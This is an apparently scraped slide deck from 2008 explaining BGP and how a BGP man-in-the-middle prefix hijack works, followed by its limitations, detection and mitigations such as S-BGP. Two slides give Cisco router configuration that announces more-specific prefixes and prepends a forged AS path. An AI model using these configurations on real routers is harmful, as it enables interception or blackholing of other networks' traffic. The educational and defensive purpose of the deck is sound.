Embed Size (px)
DESCRIPTION
Jason Froehlich December 10, 2008. BGP Man in the Middle Attack. What is BGP?. Routing for whole Internet Autonomous Systems (AS) Classless Interdomain Routing (CIDR) 190.100.0.0/16190.100.0.0, 255.255.0.0. How BGP Works. AS Border Router - “BGP Speaker” - PowerPoint PPT Presentation
Citation preview
BGP Man in the Middle Attack
Jason Froehlich
December 10, 2008
What is BGP?
Routing for whole Internet
Autonomous Systems (AS)
Classless Interdomain Routing (CIDR)
190.100.0.0/16 190.100.0.0, 255.255.0.0
How BGP Works
AS Border Router - “BGP Speaker”
Advertise own routes, redistribute others
Update Messages
“AS_PATH” field
Path Selection
Most “Specific” Network
190.100.0.0/17 over 190.100.0.0/16
The Man in the Middle Attack
Requirements:
Redirect all traffic to Attacker
Forward traffic onto Target
Relies on trust built into BGP
Attack Threats
Confidentiality
Capture all packets
Integrity
Modify packets before delivery
Availability
Black Hole
Filtering selected packets
Implementation
190.100.0.0/16 (AS100) is Target
AS900 is Attacker
Implementation – Step 1
Advertise New Routes
More specific
190.100.0.0/17, 190.100.128.0/17
Implementation – Step 1router bgp 900
network 190.100.0.0 mask 255.255.128.0network 190.100.128.0 mask 255.255.128.0...neighbor <ip address of AS600 router> remote-as 600neighbor <ip address of AS700 router> remote-as 700neighbor <ip address of AS800 router> remote-as 800no auto-summary
Implementation – Step 2
Create Route Back to Target
Modify “AS_PATH” field of advertisement
Add each AS in route to target
Implementation – Step 2
ip prefix-list victim permit 190.100.0.0/16route-map mitm permit 10 match ip address prefix-list victim set as-path prepend 600 300 100ip route 190.100.0.0 255.255.128.0 <ip address of AS600 rtr>ip route 190.100.128.0 255.255.128.0 <ip address of AS600 rtr>
Attack Limitations
Access to BGP Router
No script kiddies, but pool still large
Half of the Conversation
Only sees Inbound traffic
Resolve: 2nd BGP MITM, Other MITM (DNS)
Incomplete Route Distribution
AS's in Return Path
Attack Limitations cont.
Packet Route Visible
Traceroute
Resolve: TTL Modification
BGP Updates Visible
Alert a perceptive Administrator
Encrypted Traffic
Cannot decrypt payload
Mitigating the Attack - Prevention
Filtering
Must be done by every ISP
Internet Routing Registry
Overhead
Poor Database Maintenance / Security
Mitigating the Attack - Detection
Monitor for BGP Updates
BGPmon.net
Mitigating the Attack - Response
Counter-Attack
Advertise even more specific networks
ISP Disconnect Attacker
May take hours to days
Youtube.com – February 2008
Mitigating the Attack – Securing BGP
S-BGP
2 Certificates – IP address, AS
Secure Origin BGP
Topologies
Interdomain Route Validation
Out of band verification
Conclusion
BGP Man in the Middle
Powerful Attack
Easy to Implement
Difficult to Mitigate
